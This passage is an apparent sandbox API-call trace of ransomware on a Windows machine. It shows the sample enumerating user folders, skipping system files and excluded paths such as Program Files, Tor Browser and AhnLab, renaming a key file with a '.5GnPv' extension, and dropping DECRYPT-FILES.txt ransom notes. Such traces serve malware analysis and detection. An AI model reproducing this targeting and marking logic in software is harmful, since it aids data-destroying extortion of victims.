lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0077.467] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0077.467] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0077.467] lstrcpyA (in: lpString1=0x3f2c7fc, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0077.468] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0077.468] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f") returned 183 [0077.468] wsprintfW (in: param_1=0x3f2d4b4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv") returned 189 [0077.468] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5GnPv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\fda992c8d564f97e48410a19a2e459f6_0303d5b4-ffe9-470e-9dd8-7d9ec416e53f.5gnpv"), dwFlags=0x0) returned 1 [0077.468] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.469] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.469] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.469] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa563120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa563120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa563120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="DECRYPT-FILES.txt") returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="autorun.inf") returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="boot.ini") returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="desktop.ini") returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat") returned -1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="iconcache.db") returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="bootsect.bak") returned 1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="ntuser.dat.log") returned -1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="thumbs.db") returned -1 [0077.469] lstrcmpiW (lpString1="jkbimi8.tmp", lpString2="Bootfont.bin") returned 1 [0077.469] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.469] lstrcmpiW (lpString1="tmp", lpString2="lnk") returned 1 [0077.469] lstrcmpiW (lpString1="tmp", lpString2="exe") returned 1 [0077.469] lstrcmpiW (lpString1="tmp", lpString2="sys") returned 1 [0077.470] lstrcmpiW (lpString1="tmp", lpString2="dll") returned 1 [0077.470] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned 114 [0077.470] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.470] lstrcpyW (in: lpString1=0x3f2dcb4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\" [0077.470] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\", lpString2="jkbimi8.tmp" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp" [0077.470] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0077.470] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Crypto\\RSA\\S-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\crypto\\rsa\\s-1-5-21-3388679973-3930757225-3770151564-1000\\jkbimi8.tmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0077.470] CloseHandle (hObject=0x0) returned 0 [0077.470] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0077.470] FindNextFileW (in: hFindFile=0x5f8d58, lpFindFileData=0x3f2e4e4 | out: lpFindFileData=0x3f2e4e4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa563120, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa563120, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa563120, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="jkbimi8.tmp", cAlternateFileName="")) returned 0 [0077.470] FindClose (in: hFindFile=0x5f8d58 | out: hFindFile=0x5f8d58) returned 1 [0077.470] CloseHandle (hObject=0x458) returned 1 [0077.471] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x681f1360, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0xa1e34990, ftLastAccessTime.dwHighDateTime=0x1d2e627, ftLastWriteTime.dwLowDateTime=0xa1e34990, ftLastWriteTime.dwHighDateTime=0x1d2e627, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="S-1-5-21-3388679973-3930757225-3770151564-1000\\", cAlternateFileName="S-1-5-~1")) returned 0 [0077.471] FindClose (in: hFindFile=0x5f8d18 | out: hFindFile=0x5f8d18) returned 1 [0077.471] CloseHandle (hObject=0x450) returned 1 [0077.471] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2014, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x681f1360, ftLastAccessTime.dwHighDateTime=0x1d2dd9e, ftLastWriteTime.dwLowDateTime=0x681f1360, ftLastWriteTime.dwHighDateTime=0x1d2dd9e, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="RSA\\", cAlternateFileName="")) returned 0 [0077.472] FindClose (in: hFindFile=0x5f8cd8 | out: hFindFile=0x5f8cd8) returned 1 [0077.472] CloseHandle (hObject=0x448) returned 1 [0077.472] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xaa516e60, ftCreationTime.dwHighDateTime=0x1d5981b, ftLastAccessTime.dwLowDateTime=0xaa516e60, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa516e60, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x23fc, dwReserved0=0x0, dwReserved1=0x0, cFileName="DECRYPT-FILES.txt", cAlternateFileName="DECRYP~1.TXT")) returned 1 [0077.472] lstrcmpiW (lpString1="DECRYPT-FILES.txt", lpString2="DECRYPT-FILES.txt") returned 0 [0077.472] FindNextFileW (in: hFindFile=0x5f8c98, lpFindFileData=0x3f2ec58 | out: lpFindFileData=0x3f2ec58*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Document Building Blocks", cAlternateFileName="DOCUME~1")) returned 1 [0077.472] lstrcmpW (lpString1="Document Building Blocks", lpString2=".") returned 1 [0077.472] lstrcmpW (lpString1="Document Building Blocks", lpString2="..") returned 1 [0077.472] lstrcatW (in: lpString1="Document Building Blocks", lpString2="\\" | out: lpString1="Document Building Blocks\\") returned="Document Building Blocks\\" [0077.472] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\", lpString2="Document Building Blocks\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\" [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Program Files") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch=":\\Windows") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Games\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\All Users") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="AhnLab") returned 0x0 [0077.472] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.472] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0077.472] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.472] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\jkbimi8.tmp") returned 93 [0077.472] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x448 [0077.473] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0077.473] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.473] wsprintfW (in: param_1=0x3f2e1bc, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\DECRYPT-FILES.txt") returned 99 [0077.473] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x44c [0077.474] WriteFile (in: hFile=0x44c, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2e1b8, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2e1b8*=0x23fc, lpOverlapped=0x0) returned 1 [0077.474] CloseHandle (hObject=0x44c) returned 1 [0077.475] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\") returned 81 [0077.475] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*" [0077.475] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\*", lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8cd8 [0077.475] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.475] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.475] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.475] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.475] FindNextFileW (in: hFindFile=0x5f8cd8, lpFindFileData=0x3f2e9dc | out: lpFindFileData=0x3f2e9dc*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="1033", cAlternateFileName="")) returned 1 [0077.475] lstrcmpW (lpString1="1033", lpString2=".") returned 1 [0077.475] lstrcmpW (lpString1="1033", lpString2="..") returned 1 [0077.475] lstrcatW (in: lpString1="1033", lpString2="\\" | out: lpString1="1033\\") returned="1033\\" [0077.475] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\", lpString2="1033\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\" [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Program Files") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch=":\\Windows") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Games\\") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Tor Browser\\") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\ProgramData\\") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\cache2\\entries\\") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Low\\Content.IE5\\") returned 0x0 [0077.475] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\User Data\\Default\\Cache\\") returned 0x0 [0077.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\All Users") returned 0x0 [0077.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\IETldCache\\") returned 0x0 [0077.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\Local Settings\\") returned 0x0 [0077.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="\\AppData\\Local") returned 0x0 [0077.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="AhnLab") returned 0x0 [0077.476] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpSrch="{0AFACED1-E828-11D1-9187-B532F1E9575D}") returned 0x0 [0077.476] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0077.476] lstrlenW (lpString="jkbimi8.tmp") returned 11 [0077.476] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\jkbimi8.tmp") returned 98 [0077.476] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\jkbimi8.tmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\jkbimi8.tmp"), dwDesiredAccess=0x0, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x4000000, hTemplateFile=0x0) returned 0x450 [0077.477] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0077.477] lstrlenW (lpString="DECRYPT-FILES.txt") returned 17 [0077.477] wsprintfW (in: param_1=0x3f2df40, param_2="%s\\%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\DECRYPT-FILES.txt") returned 104 [0077.477] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\\\DECRYPT-FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\microsoft\\document building blocks\\1033\\decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x454 [0077.477] WriteFile (in: hFile=0x454, lpBuffer=0xf70000*, nNumberOfBytesToWrite=0x23fc, lpNumberOfBytesWritten=0x3f2df3c, lpOverlapped=0x0 | out: lpBuffer=0xf70000*, lpNumberOfBytesWritten=0x3f2df3c*=0x23fc, lpOverlapped=0x0) returned 1 [0077.478] CloseHandle (hObject=0x454) returned 1 [0077.478] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\") returned 86 [0077.478] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="*" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*" [0077.478] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\*", lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x5f8d18 [0077.478] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0077.478] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0xaa621800, ftLastAccessTime.dwHighDateTime=0x1d5981b, ftLastWriteTime.dwLowDateTime=0xaa621800, ftLastWriteTime.dwHighDateTime=0x1d5981b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0077.478] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0077.478] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0077.478] FindNextFileW (in: hFindFile=0x5f8d18, lpFindFileData=0x3f2e760 | out: lpFindFileData=0x3f2e760*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x4f766d30, ftCreationTime.dwHighDateTime=0x1d2dda4, ftLastAccessTime.dwLowDateTime=0x4f766d30, ftLastAccessTime.dwHighDateTime=0x1d2dda4, ftLastWriteTime.dwLowDateTime=0x4f766d30, ftLastWriteTime.dwHighDateTime=0x1d2dda4, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="14", cAlternateFileName="")) returned 1 [0077.479] lstrcmpW (lpString1="14", lpString2=".") returned 1 [0077.479] lstrcmpW (lpString1="14", lpString2="..") returned 1 [0077.479] lstrcatW (in: lpString1="14", lpString2="\\" | out: lpString1="14\\") returned="14\\" [0077.479] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\", lpString2="14\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\" [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch="\\Program Files") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", lpSrch=":\\Windows") returned 0x0 [0077.479] StrStrW (lpFirst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Document Building Blocks\\1033\\14\\", 